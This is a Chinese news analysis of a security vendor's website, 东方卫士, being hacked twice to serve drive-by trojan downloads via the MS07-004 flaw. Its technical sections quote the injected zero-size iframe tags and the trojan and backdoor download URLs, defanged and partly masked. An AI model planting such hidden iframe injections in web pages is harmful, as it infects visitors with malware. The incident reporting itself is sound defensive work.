东方卫士被挂马 安全网站安全谁来保证

　　【编者按：为安全起见，文中“http”均被替换为“hxxp”，“<>”均被替换为“[]”，特此说明。】

　　前两天有网友反映国内知名的安全网站东方卫士再次被挂载木马，这已经是东方卫士第二次暴露出存在安全隐患。

　　回顾

　　在此之前就曾发生过一次东方卫士网站首页（hxxp://www.i110.com）存在恶意代码引用的事件，如果用户没有安装过微软的MS07-004补丁程序，并且使用IE浏览器访问上述页面的话，就会感染木马病毒。

　　技术分析：

　　1. 东方卫士网站首页代码中，包含了一处对恶意网页的引用语句：

　　[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

　　如图1：

图1

　　2.这个被引用的恶意网页中包含了利用MS07-004漏洞的代码，使得系统能够自动下载hxxp://***.ch/xia.exe（Trojan-Downloader.Win32.agent.ddz）到本地，并运行。

　　3.xia.exe是个木马下载器，该木马复制自身到%system32%目录下，命名为wdfmg1r32.exe，运行后下载灰鸽子病毒hxxp://***.li/2.exe（Backdoor.Win32.Hupigon.cpb）。

　　4.2.exe是灰鸽子病毒最新变种，采用RootKit技术编写，隐藏进程。它复制自身到%system32%目录下，命名为system32.exe，该病毒运行后会释放文件到 %WinDir%\svchost.exe，文件大小为381440字节，并创建下面服务：

　　服务名：Net work nois

　　服务描述：Net work nois

　　服务程序：C:\WINNT\svchost.exe

　　另外还会下载hxxp://lxn2wyf8899.3322.org/ip.txt到本地系统临时目录下。ip.txt包含的内容为：

　　hxxp://221.215.170.192:5600/wwwroot/（该IP对应地址为：山东省青岛市(李

　　沧区)网通ADSL）

　　染毒电脑将被黑客远程完全控制，这些操作可能是任意文件操作、注册表操作、键盘记录、下载执行远程程序、任意网络操作甚至远程开机摄像头监控等。

　　再次被挂马

　　而这一次，在东方卫士主页上，通过查看页面源代码，可以看到网页中被插入一条“[ iframe src=”指令，该指令将隐藏打开一个新的页面，这个页面伪造了浏览器无法开的错误网页，并在后台隐藏打开三个页面，进行木马下载。

　　打开的隐藏页面代码：

　　[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0

　　height=0 frameborder=0][/iframe]

　　在打开的伪造错误页面中会打开三个网页：

　　[iframe src="hxxp://www.****.cn/33/Reflector/4.htm"

width="0"

　　height="0" frameborder="0"][/iframe]

　　[iframe src="hxxp://www.****.cn/33/Reflector/2.htm"

width="0" height="0" frameborder="0"]

　　[/iframe]

　　[iframe src="hxxp://www.*****.com/wm/20/5.htm"

width="0" height="0" frameborder="0"]

　　[/iframe]

　　下载木马：

　　hxxp://www.****.cn/33/Reflector/1.exe（无效）

　　hxxp://www.*****.com/0.exe

图2

图3

　　再一却又再二，是否还会再三再四

　　我们常说“再一再二，不可再三再四”。作为防护先锋的安全网站，其在用户心目中的可信度、影响度都是极高的，他们任何一次疏忽所带来的危害性都远大于木马病毒自身所造成的破坏。第一次发生网站被挂载木马的事件后，相信东方卫士应该已经采取了相应的措施。但挂马事件却能够再次发生，这就需要引起我们的警惕与反思了。

　　再次挂马，说明在“矛”与“盾”的斗争中，“矛”又一次的占据了上风。同时，东方卫士网站一而的再被挂马，除了系统自身依然存在尚未发现的漏洞外，其在自身网站的安全监控上也应当还存在着一定的、可被利用的缺陷。

　　在以前的文章中我们曾提到CNN由于未能及时更新它的防毒软件，遭到了一种“本可以被及时检测到”蠕虫病毒的攻击。“矛”与“盾”永远都是并存的，不可能出现某一个完全盖过另一个的情况，只能是或者二者并存、或者二者同消失。也就是说，二次挂马事件的出现，除了是因为出现了新的“矛”，更是因为“盾”的上面再一次出现了漏洞，给了“矛”以可乘之机。

　　有则改之，出现了问题并不可怕，怕的是不知道这个问题是如何出现的，怕的是我们不知道如何去防范、避免问题的再次出现。

　　安全网站它代表的不仅仅是一个公司、一个集团，它更是网络安全斗争的最前沿。当它连自身的安全都无法保证时，又让普通用户去如何面对日趋危险的网络世界，又让普通用户去如何知道除了自己还有谁能来帮助他抵御网络威胁的入侵。

　　当安全网站也被击倒了，我们还能信任谁！安全网站的安全谁来保证？

　　相关资料

　　MS07-004漏洞：是Microsoft公司多个版本的操作系统对矢量标记语言（VML）的支持存在整数溢出，导致可以执行任意指令，使的远程攻击者可以利用此漏洞控制用户机器。

　　东方卫士：交大铭泰信息安全公司，国内知名信息安全厂商，该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。